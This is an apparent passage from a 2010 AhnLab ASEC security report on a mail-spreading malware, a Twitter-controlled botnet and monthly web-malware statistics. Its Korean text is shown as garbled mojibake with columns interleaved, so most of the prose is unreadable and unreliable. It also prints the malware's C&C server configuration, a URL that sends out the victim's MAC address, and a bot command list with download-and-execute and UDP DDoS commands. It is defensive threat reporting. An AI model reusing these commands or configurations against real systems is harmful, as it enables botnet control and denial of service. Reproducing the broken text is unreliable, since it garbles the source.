๋ ํ์ผ์ ์คํํ๋ฉด, ์์คํ ์ MAC ์ฃผ์์ P2P ํ๋ก๊ทธ๋จ์ธ ํ๋ฃจ๋์ ์ด
๋ฎฌ์ ํ๋ก๊ทธ๋จ ์ค์น ์ ๋ณด๋ฅผ ์ ์กํ๋ค.
[์์ฒญ์ ๋ณด]
- ์ ๋ณด์ ์ก URL :
http://www.pa[์ญ์ ]m/v1.0/cmd.php?mac_addr=000c2[์ญ์ ]c&ver=20
100501&prunaInstall=0&emulInstall=0
์ ๋ณด๋ฅผ ์ ์กํ๋ ๊ณณ์ IP๊ฐ ํ๊ตญ์ ์์นํ ์์คํ ์ด๋ค. ์ ์ ๋ณด ์ธ์๋ ๋ช
๊ตฐ๋ฐ๋ฅผ ์ ์ํ๋๋ฐ IP ๋์ญ ๋ชจ๋๊ฐ ํ๊ตญ์ ์์นํ ๊ณณ์ด๋ค. ์ผ๋จ ์ ๋ณด๋ฅผ ์
์กํ๋ฉด ์๋ฒ๋ก๋ถํฐ ๋ฉ์ผ ๋ฐ์ก๊ณผ ๊ด๋ จํ ๊ณต๊ฒฉ์ ๋ณด๋ฅผ ์ ๋ฌ๋ฐ๋๋ค. ์ ๋ฌ๋
๋ ๋ด์ฉ ํํ๋ ์๋์ ๊ฐ๋ค.
06 ASEC Report _ 2010. Vol.05
์์ ๋คํธ์ํฌ์ ๋ํ, ํธ์ํฐ(Twitter)๋ฅผ ์ด์ฉํ ๋ด๋ท ์ฆ๊ฐ ์ฐ๋ ค
๋ํ์ ์ธ ์์ ๋คํธ์ํฌ๋ฅผ ๋ฝ์ผ๋ผ ํ๋ฉด, ํธ์ํฐ๊ฐ ๋น ์ง ์ ์๋ค. ๊ตญ๋ด์
์๋ ํธ์ํฐ์ ์ฌ์ฉ์์ธต์ด ๋ํฐ์ ์ง๊ณ ์์ผ๋ฉฐ, ๊ฐ์ธ ๋ฟ ์๋๋ผ ๊ธฐ์ ์
์๋ ๋ง์ผํ , ํ๋ณด์ฉ๋๋ก๋ ์ฌ์ฉ๋๊ณ ์๋ค. ๊ทธ๋ฐ๋ฐ ์ด ํธ์ํฐ๊ฐ ๋ด๋ท์ผ๋ก
์ด์ฉ๋๊ณ ์์ผ๋ฉฐ, ์ธ๊ตญ์์๋ ์ ์ฐจ ์ด์ํ๋๊ณ ์๋ค๊ณ ํ๋ค. ์ฐ์ ๊ณต๊ฒฉ
์๋ ํธ์ํฐ ๊ณ์ ์ ์์ฑํ๊ฑฐ ๋ ๋๋ ๋ค๋ฅธ ์ฌ๋์ ๊ฒ์ ๋์ฉํ์ฌ ๊ณต๊ฒฉ์
์ค๋นํ๋ค. ๊ทธ๋ฆฌ๊ณ ์ฌ์ฉ์์๊ฒ๋ ์ ์กํ ํ์ผ์ด๋ URL์ฃผ์๋ฅผ ์ฌํ๊ณตํ์
์ธ ๋ฐฉ๋ฒ์ ์ด์ฉํ์ฌ ์ฌ์ฉ์๊ฐ ํด๋ฆญํ๋๋ก ์ ๋ํ๋ค. ๋ง์ฝ ์ฌ์ฉ์๊ฐ ํ์ผ
์ ํด๋ฆญํ๋ฉด ํด๋น ์ ์ฑ์ฝ๋์ ๊ฐ์ผ์ด ๋๋ฉด์ ์ฌ์ ์ ์๋ ํธ์ํฐ์ ์ ์
์ ์๋ํ๊ฒ ๋๋ค. ๊ณต๊ฒฉ์๋ ์ด๋ ํธ์ํฐ์ ๊ณต๊ฒฉ๋ช ๋ น์ ํธ์ํ๋ ๊ฒ๋ง์ผ
๋ก ์ฝ๊ฒ ์ ์ด๋ฅผ ํ ์ ์๊ฒ ๋๋ค. ์ ์๋ฐฉ์์ด ํธ์ํฐ๋ฅผ ์ด์ฉํ ํํ๊ฐ ๋
์๋ค๋ ๊ฒ์ด์ง, ๊ณผ๊ฑฐ์ IRC ์ฑ๋์ ์ด์ฉํ ๊ฒ๊ณผ๋ ๋ฐฐ๊ฒฝ ๋ฉด์์ ํฐ ์ฐจ์ด์
์ ์๋ค. ํธ์ํฐ๋ฅผ ์ด์ฉํ ๊ณต๊ฒฉ ๋ช ๋ น ํํ๋ฅผ ๋ณด๋ฉด ์๋์ ๊ฐ๋ค:
[๊ทธ๋ฆผ 2-4] ํธ์ํฐ ๋ด์ ์์ฑํ๋ ๋๊ตฌ ํ๋ฉด ์์
์์ ๊ฐ์ ๋๊ตฌ๋ฅผ ์ฌ์ฉํ์ฌ ๋ด์ ์์ฑํ๊ฒ ๋๋ฉด ํ์ผ ๋๋ถ๋ถ์ ๋ค์ ํ๋ฉด
๊ณผ ๊ฐ์ด ์ ๋ ฅํ ํธ์ํฐ ์ ๋ณด๊ฐ ๋ค์ด๊ฐ ์์์ ํ์ธํ ์ ์๋ค.
<mailFileName><![CDATA[favorite.exe]]></mailFileName>
<mailSendTerm>43200000</mailSendTerm>
<mailSendMax>200</mailSendMax>
<mailRepeat>2</mailRepeat>
<CmdServer>http://www.pa[์ญ์ ]s.com/v1.0/cmd.php</CmdServer>
<CmdServer1>http://www.k[์ญ์ ]om/v1.0/cmd.php</CmdServer1>
<CmdServer2>http://www.k[์ญ์ ]8.com/v1.0/cmd.php</CmdServer2>
<CmdUpdateTime>300000</CmdUpdateTime>
<delayWindow>100000</delayWindow>
<CntWindow>1</CntWindow>
<ifRandom>1</ifRandom>
</CONFIG>
์ฆ, ๋ช ๋ น์ ๋ด๋ฆฌ๋ ๊ณณ์ 3๊ตฐ๋ฐ์ C&C ์๋ฒ๊ฐ ์๋ ๊ฒ์์ ๋๋ต ์ถ์ ํด
๋ณผ ์ ์๋ค. ๊ธฐ์ ๋ค์์๋ ๋ณดํต ์น ์ ์์ด ๋ฐฉํ๋ฒฝ์์ ๋ง์ด ํ์ฉ๋์ด ์๋
๋งํผ, ์ ์ฑ์ฝ๋์ ์๊ฒฉ์ ์ด ๋ฐฉ์์ผ๋ก HTTP ํ๋กํ ์ฝ์ ์ด์ฉํ์ฌ ์ ๋ณด๋ฅผ
์ฃผ๊ณ ๋ฐ๋ ํํ๊ฐ ๋์ธ์ด๋ค. ๊ธฐ์ ๋ฐ์ ์ ๋ฐ๋ผ ์ด๋ฌํ ์ ๊ทผ ๋ฐฉ์๋ ๋ฐ๋๊ฒ
์ง๋ง ์์ผ๋ก ๋น๋ถ๊ฐ์ HTTP๊ฐ ์ ์ฑ์ฝ๋์ ์ฃผ์ํ ํต์ ์๋จ์ด ๋ ๊ฒ์ด๋ค.
> .DOWNLOAD*link.com/direct.exe*cutomnamefor.exe*0 [ 0 = Download,
1 = > Download & Exec ]
> .DDOS*IP*PORT [ UDP Attack ]
> .VISIT*link.com/video*0 [ 0 = Invisible, 1 = Visible ]
> .SAY*Hello my infectants! [ Fun, useless command, Text To Speech ]
> .STOP [ Stops all current processes. DDOS, Visiting.]
> .REMOVEALL [ Removes all bots connected. ]
๊ณต๊ฒฉ ๋ช ๋ น์ ์์ ๋ง ๋ณด์๋ ๋์ถฉ ์ถ์ธก์ด ๊ฐ๋ฅํ ๊ฒ์ด๋ค. ํน์ ํ URL ์ฃผ
์์์ ํ์ผ์ ๋ค์ด๋ก๋ ๋ฐ๊ฒ ํ๋ค๋ ์ง ํน์ ํ ์์ดํผ๋ก DDoS ๊ณต๊ฒฉ์
์ํํ๊ฑฐ๋, ์ฌ์ดํธ ๋ฐฉ๋ฌธ ๋ฑ ๋ค์ํ ๋ช ๋ น์ด๋ฅผ ํตํด ์ฌ์ฉ์์ ์ปดํจํฐ๋ฅผ ์ฌ
๋ฌ ๊ฐ์ง ๋ฐฉ๋ฒ์ผ๋ก ์ ์ดํ ์ ์๋ค.
[๊ทธ๋ฆผ 2-5] ์์ฑ๋ ๋ด ํ์ผ์ ๋ด๋ถ์ฝ๋
์ด์ธ ์ธํฐ๋ท์์๋ ์๊ฐ๋๊ณ ์๋ ๋ ๋ค๋ฅธ ํธ์ํฐ ๋ด์ ํ๋ฉด์ ์๋์
๊ฐ๋ค.
ํธ์ํฐ๊ฐ ๋์ค์ ์ผ๋ก ์ด์ฉ๋๊ณ ์๋ ๋งํผ ๊ณต๊ฒฉ์๋ค์ ํธ์ํฐ์ ๊ฐ์
SNS ํ๊ฒฝ์ ๊ณต๊ฒฉ์ ์ํ ๋๊ตฌ๋ก ํ์ฉํ๋ ์ฌ๋ก๊ฐ ๋์ด๋๊ณ ์๋ค. ์ด๋ฒ
ํธ์ํฐ ๋ด๋ท์ ์์ผ๋ก ๋ฐ์ํ ์ ์๋ SNS๋ฅผ ์ด์ฉํ ๊ณต๊ฒฉ์ ์์์ผ์ง
๋ ๋ชจ๋ฅธ๋ค.
[๊ทธ๋ฆผ 2-4] ํธ์ํฐ ๋ด์ ์์ฑํ๋ ๋๊ตฌ ํ๋ฉด ์์
์ด๋ฏธ ํธ์ํฐ ๋ด๋ท์ ์์ฑํ๋ ๋๊ตฌ๋ ๋์ ์์ด, ํธ์ํฐ ๋ด๋ท ํ๋ก๊ทธ๋จ์
์ฝ๊ฒ ์์ฑํ ์๊ฐ ์๋ค.
AhnLab Trusguard
์ธ์์์ ๊ฐ์ฅ ์์ ํ ์ด๋ฆ ์์ฒ ์์ฐ๊ตฌ์ 07
[ํ 3-1] ์น ์ฌ์ดํธ ๋ณด์ ์์ฝ
์ ์ฑ์ฝ๋ ๋ฐ๊ฒฌ ๊ฑด์๋
142,613๊ฑด์ด๊ณ , ์ ์ฑ
์ฝ๋ ์ ํ์ 930๊ฑด์ด
๋ฉฐ, ์ ์ฑ์ฝ๋๊ฐ ๋ฐ๊ฒฌ
๋ ๋๋ฉ์ธ์ 1,084๊ฑด
์ด๋ฉฐ, ์ ์ฑ์ฝ๋ ๋ฐ๊ฒฌ๋
URL์ 4,950 ๊ฑด์ด๋ค.
2010๋ 5์์ 2010๋
4์๋ณด๋ค ์ ๋ค์ ๊ฐ์
3. ์น ๋ณด์ ๋ํฅ
์น ๋ณด์ ํต๊ณ
์น ์ฌ์ดํธ ๋ณด์ ์์ฝ
์๋ณ ์ ์ฑ์ฝ๋ ๋ฐ๊ฒฌ ๊ฑด์
[๊ทธ๋ฆผ 3-1] ์๋ณ ์ ์ฑ์ฝ๋ ๋ฐ๊ฒฌ ๊ฑด์
ํ์์ผ๋, ์ ์ฑ์ฝ๋ ๋ฐ๊ฒฌ ๊ฑด์, ์ ์ฑ์ฝ๋ ์ ํ, ์ ์ฑ์ฝ๋๊ฐ ๋ฐ๊ฒฌ๋ ๋๋ฉ
์ธ, ์ ์ฑ์ฝ๋ ๋ฐ๊ฒฌ๋ URL ์ ์ฆ๊ฐํ์๋ค.
2010๋ 5์ ์ ์ฑ์ฝ๋ ๋ฐ๊ฒฌ ๊ฑด์๋ ์ ๋ฌ์ 111,045๊ฑด์ ๋นํด 128% ์
์ค์ธ 142,613๊ฑด์ด๋ค.
์๋ณ ์ ์ฑ์ฝ๋ ์ ํ
[๊ทธ๋ฆผ 3-2] ์๋ณ ์ ์ฑ์ฝ๋ ์ ํ
2010๋ 5์ ์ ์ฑ์ฝ๋ ์ ํ์ ์ ๋ฌ์ 926๊ฑด์ ๋นํด 100% ์์ค์ธ 930
๊ฑด์ด๋ค.
[๊ทธ๋ฆผ 3-3] ์๋ณ ์ ์ฑ์ฝ๋๊ฐ ๋ฐ๊ฒฌ๋ ๋๋ฉ์ธ
์๋ณ ์ ์ฑ์ฝ๋๊ฐ ๋ฐ๊ฒฌ๋ ๋๋ฉ์ธ
2010๋ 5์ ์ ์ฑ์ฝ๋๊ฐ ๋ฐ๊ฒฌ๋ ๋๋ฉ์ธ์ ์ ๋ฌ์ 1,028๊ฑด์ ๋นํด 105%
์์ค์ธ 1,084๊ฑด์ด๋ค.
์๋ณ ์ ์ฑ์ฝ๋๊ฐ ๋ฐ๊ฒฌ๋ URL
[๊ทธ๋ฆผ 3-4] ์๋ณ ์ ์ฑ์ฝ๋๊ฐ ๋ฐ๊ฒฌ๋ URL
2010๋ 5์ ์ ์ฑ์ฝ๋๊ฐ ๋ฐ๊ฒฌ๋ URL์ ์ ๋ฌ์ 3,898๊ฑด์ ๋นํด 127% ์
์ค์ธ 4,950๊ฑด์ด๋ค.
์ ์ฑ์ฝ๋ ์ ํ๋ณ ๋ฐฐํฌ ์
[ํ 3-2] ์ ์ฑ์ฝ๋ ์ ํ๋ณ ๋ฐฐํฌ ์
08 ASEC Report _ 2010. Vol.05
[๊ทธ๋ฆผ 3-5] ์ ์ฑ์ฝ๋ ์ ํ๋ณ ๋ฐฐํฌ ์
์ ์ฑ์ฝ๋ ๋ฐฐํฌ Top 10
์ ์ฑ์ฝ๋ ์ ํ๋ณ ๋ฐฐํฌ ์์์ ์ ๋์จ์ด(ADWARE)๋ฅ๊ฐ 86,027๊ฑด ์ ์ฒด์
60.3%๋ก 1์๋ฅผ ์ฐจ์งํ์์ผ๋ฉฐ, ํธ๋ก์(TROJAN)๋ฅ๊ฐ 13,297๊ฑด์ผ๋ก ์ ์ฒด
์ 9.3%๋ก 2์๋ฅผ ์ฐจ์งํ์๋ค.
[ํ 3-3] ์ ์ฑ์ฝ๋ ๋ฐฐํฌ Top 10
์น ๋ณด์ ์ด์
๊ตฌ๊ธ ๊ทธ๋ฃน์ค(Google Groups)์ ์คํธ๋ฉ์ผ์ด ๊ฒฐํฉ๋ ์ ์ฑ์ฝ๋
์ต๊ทผ ํฌํธ ์ฌ์ดํธ์์ ํ๋ฅญํ ์ธํ๋ผ๋ก ๋ฌด์ฅ๋ ์์ ์ ์ด๊ณ ํธ๋ฆฌํ ์๋น
์ค๋ฅผ ๋ง์ด ์ ๊ณตํ๊ณ ์๋ค. ๋ฌด๋ฃ๋ก ์ด์ฉํ ๊ฒฝ์ฐ์๋ ์ฉ๋ ์ ํ ๋ฑ์ด ์์ง
๋ง, ๊ฐ์ธ ์ฌ์ฉ์์๊ฒ๋ ์ถฉ๋ถํ ์ฌ์ฉํ ๋งํ ๊ฐ์น๊ฐ ์๋ ์๋น์ค๋ค์ด ๋ง๋ค.
ํนํ, ๊ตฌ๊ธ์์ ์ ๊ณตํ๋ ์๋น์ค๋ค์ ํ์ ์ ์ด๋ฉฐ, ํธ๋ฆฌ์ฑ์ ๊ฐ์กฐํ ์๋น
์ค๋ค์ด ๋ง๋ค. ๊ทธ ์ค์์๋ ๊ตฌ๊ธ ๊ทธ๋ฃน์ค(Goolge Group)๋ ์ํธ ์ ๋ณด๋ฅผ ๊ต
ํํ๊ณ ์ถ์ ์ฌ๋๋ค๊ฐ์ ๊ฐ์์ ๊ทธ๋ฃน์ ๋ง๋ค๊ณ ๊ฒ์ํ์ ํตํด ๊ณต์ง์ฌํญ,
ํ์ผ ๋ฑ์ ์์ฝ๊ฒ ๊ทธ๋ฃน์๋ค์๊ฒ ์ ํํ ์ ์๋ ๊ตฌ๊ธ ํด๋ผ์ฐ๋ ์ปดํจํ ์
๋น์ค ์ค ํ๋์ด๋ค. ์ด๋ฌํ ํธ๋ฆฌํ ์๋น์ค๋ฅผ ์คํจ๋จธ (Spammer)๋ค์ด ์คํธ
๋ฉ์ผ์ ํตํ ์ ์ฑ์ฝ๋ ์ ํ ์์ ํ์ฉํ๋ ์ฌ๋ก๊ฐ ๋ฐ๊ฒฌ๋์ด ์ด๋ฒ Volume
์ ํตํด ๊ณต์ ํ๊ณ ์ ํ๋ค.
์ด๋ฒ์ ๋ฐ๊ฒฌ๋ ์คํธ๋ฉ์ผ์ ๊ธฐ์กด ๋ฉ์ผ๊ณผ ๋ง์ฐฌ๊ฐ์ง๋ก, ์ผ์์ ์ธ ๋ด์ฉ์ ๋ด
์ ์ฑ์ฝ๋ ๋ฐฐํฌ Top10์์ Win-Adware/Shortcut.InlivePlayerAc-
tiveX.234 ๊ฐ 23,276๊ฑด์ผ๋ก 1์๋ฅผ ์ฐจ์งํ์์ผ๋ฉฐ, Top10์ HTML/IF-
rame๋ฑ 5๊ฑด์ด ์๋ก ๋ฑ์ฅํ์๋ค.
[๊ทธ๋ฆผ 3-6] ์์ผ e ์นด๋๋ก ๊ฐ์ฅํ ์คํธ๋ฉ์ผ
์ด๋ฒ ์คํธ๋ฉ์ผ์ด ๊ธฐ์กด ์คํธ๋ฉ์ผ๊ณผ ๋ค๋ฅธ ์ ์ ๊ตฌ๊ธ ๊ทธ๋ฃน์ค๋ฅผ ํตํด ์ ์ฑ์ฝ
๋๋ฅผ ์ ํํ๋ ๊ฒ์ด๋ค. ์คํธ๋ฉ์ผ ๋ณธ๋ฌธ์์ http://t****f.googlegroups.
com/web/setup.zipโ๋ฅผ ํด๋ฆญํ๋ฉด ๊ตฌ๊ธ ๊ทธ๋ฃน์ค๋ก ์ด๋ํ์ฌ, Zipํ์ผ๋ก
์์ถ๋ ํ์ผ์ ๋ค์ด๋ก๋ ํ ์ ์๋ค. ์์ถ ํ์ผ์ ํ๋ฉด ์๋์ ๊ฐ์ด ์ค์น
ํ์ผ์ ๊ฐ์ฅํ ์คํํ์ผ ์์ด์ฝ์ด ๋ํ๋๋ฉฐ. ํด๋น ํ์ผ์ ์คํํ ๊ฒฝ์ฐ ์
์ฑ์ฝ๋๊ฐ ์ค์น๋๋ค.
[๊ทธ๋ฆผ 3-7] ์์ด์ฝ์ผ๋ก ๊ฐ์ฅํ ์ ์ฑ์ฝ๋ ํ์ผ
์ด๋ฒ Volume์์๋ ๊ตฌ๊ธ ๊ทธ๋ฃน์ค์ ๊ฐ์ด ํด๋ผ์ฐ๋ ์ปดํจํ ์๋น์ค๋ค์ ์ด
์ฉํ์ฌ, ์ ์ฑ์ฝ๋๋ฅผ ์ ํํ๋ ์ฌ๋ก๋ฅผ ์ดํด๋ณด์๋ค. ์์ผ๋ก ํด๋ผ์ฐ๋ ์ปดํจ
ํ ์๋น์ค์ ๊ฐ์ ํธ๋ฆฌํ ๊ธฐ๋ฅ๋ค์ด ๊ณ์ ๋ณดํธํ๋ ์๋ก, ํด๋ผ์ฐ๋ ์ปดํจํ
์ ๊ฐ๋ ฅํ ์ธํ๋ผ๋ฅผ ์ด์ฉํ ๋ณด์ ์ํ์ ์ฆ๊ฐํ ๊ฒ์ผ๋ก ๋ณด์ธ๋ค. ๋ฐ๋ผ์,
์ฌ์ฉ์๋ค์ ์๋ ๋ด์ฉ์ ์ค์ํ์ฌ ์ฆ๊ฐํ๋ ๋ณด์์ํ์ผ๋ก๋ถํฐ ๋ณธ์ธ์ ์ปด
ํจํฐ๋ฅผ ๋ณดํธํ๊ธฐ ๋ฐ๋๋ค.
1. ๋ฐ์ ์ธ์ด ๋ถ๋ถ๋ช ํ ๋ฉ์ผ์ผ ๊ฒฝ์ฐ ๊ฐ๊ธ์ ๋ฉ์ผ์ ํ์ธํ์ง ์๋๋ค.
2. ์ํฐ๋ฐ์ด๋ฌ์ค(๋ฐฑ์ ) ํ๋ก๊ทธ๋จ์ ์ค์นํ์ฌ ํญ์ ์ต์ ์์ง์ ์ ์งํ๋ฉฐ,
์ค์๊ฐ ๊ฐ์ ๊ธฐ๋ฅ์ ์ฌ์ฉํ๋ค.
3. ๋ฉ์ผ ๋ด์ ํฌํจ๋ ์ฒจ๋ถํ์ผ์ ๋ํด ์ํฐ๋ฐ์ด๋ฌ์ค(๋ฐฑ์ ) ํ๋ก๊ทธ๋จ์ผ๋ก
๊ฒ์ฌ๋ฅผ ํ ํ ์ด๋ํ๋ค.
4. ๋ฉ์ผ ๋ณธ๋ฌธ์ ํฌํจ๋ URL์ ๊ฐ๊ธ์ ์ ์์ ํ์ง ์๋๋ค.
๊ณ ์๋ ๋ฉ์ผ์ด๋ค. ์์ผ e์นด๋๋ฅผ ๊ฐ์ฅํ์ฌ ์ ์ฑ์ฝ๋๋ฅผ ์ ํฌํ๋ ์คํธ๋ฉ
์ผ๋ก์, [ํ1-7] ๊ณผ ๊ฐ์ ๋ด์ฉ์ผ๋ก ๊ตฌ์ฑ๋์ด ์๋ค.
AhnLab SiteGuard Pro